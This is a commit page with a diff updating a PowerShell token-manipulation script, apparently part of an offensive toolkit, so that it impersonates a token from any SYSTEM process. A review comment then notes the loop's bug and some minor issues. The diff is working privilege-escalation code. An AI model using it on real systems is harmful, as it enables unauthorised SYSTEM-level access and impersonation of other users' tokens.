| Field | Value | Date |
|---|---|---|
| author | FixTheExchange <josh.bryant@custommopar.com> | 2015-10-30 11:38:57 -0500 |
| committer | FixTheExchange <josh.bryant@custommopar.com> | 2015-10-30 11:38:57 -0500 |
| commit | 17dd6835b97ee8c40e02319301e09be35770cd2f (patch) | |
| tree | e990df435e395f4e9e61692fc762430bd0be8c2a /Exfiltration | |
| parent | 9f78286ea7b0ec65d2aa09893a076864dd8d14e9 (diff) | |
Update Invoke-TokenManipulation.ps1
Windows 10 breaks the current version of Invoke-TokenManipulation.ps1 because wininit is now a protected process. Rather than hardcoding to a specific process to obtain a SYSTEM token, it's better to enumerate all processes running as SYSTEM and find one that works. I have updated the script to version 1.12 and added logic on lines 1689-1696 to make sure it can successfully grab a SYSTEM token necessary to function.
Diffstat (limited to 'Exfiltration')
-rw-r--r-- | Exfiltration/Invoke-TokenManipulation.ps1 | 15 |
1 files changed, 11 insertions, 4 deletions
diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1 index 7bfce3b..bc680e5 100644 --- a/Exfiltration/Invoke-TokenManipulation.ps1 +++ b/Exfiltration/Invoke-TokenManipulation.ps1 @@ -49,8 +49,8 @@ Author: Joe Bialek, Twitter: @JosephBialek License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -Version: 1.11 -(1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune Mariboe, https://www.linkedin.com/in/runemariboe) +Version: 1.12 +(1.11 -> 1.12: Simple logic added by Josh M. Bryant to find an unprotected process to grab a SYSTEM token from, rather than hardcoding to wininit, https://www.fixtheexchange.com/) .DESCRIPTION @@ -1685,8 +1685,15 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke $AllTokens = @() #First GetSystem. The script cannot enumerate all tokens unless it is system for some reason. Luckily it can impersonate a system token. - #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges, so impersonate the wininit token. - $systemTokenInfo = Get-PrimaryToken -ProcessId (Get-Process wininit | where {$_.SessionId -eq 0}).Id + #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges. + #We need to enumrate all processes running as SYSTEM and find one that we can use. + $SystemTokens = Get-Process -IncludeUserName | Where {$_.Username -eq "NT AUTHORITY\SYSTEM"} + ForEach ($SystemToken in $SystemTokens) + { + $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.Id -WarningAction SilentlyContinue -ErrorAction SilentlyContinue + $SystemProcessName = $SystemToken.Name + $SystemProcessID = $SystemToken.Id + } if ($systemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken))) { Write-Warning "Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens" |
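Review bot: the ForEach loop in the second hunk does not stop at the first usable token. Without a break or a per-iteration check, $SystemTokenInfo ends up holding the result for whichever SYSTEM process happened to be enumerated last; if that one is a protected process, Get-PrimaryToken fails silently (the error is hidden by -ErrorAction SilentlyContinue) and the existing `if ($systemTokenInfo -eq $null ...)` check fires even though an earlier process in the list would have worked, which defeats the stated goal of "find one that works". Exit the loop once $SystemTokenInfo is non-null, or test each result inside the loop. The comment "unprotected process" in the changelog is also stronger than what the code does: the filter is on the user name only, and protection status is never checked. Minor points: $SystemProcessName and $SystemProcessID are assigned every iteration but never read, "enumrate" in the new comment is a typo, and Get-Process -IncludeUserName exists only on Windows PowerShell 4.0 and later and needs an elevated session, which is worth stating next to the version bump.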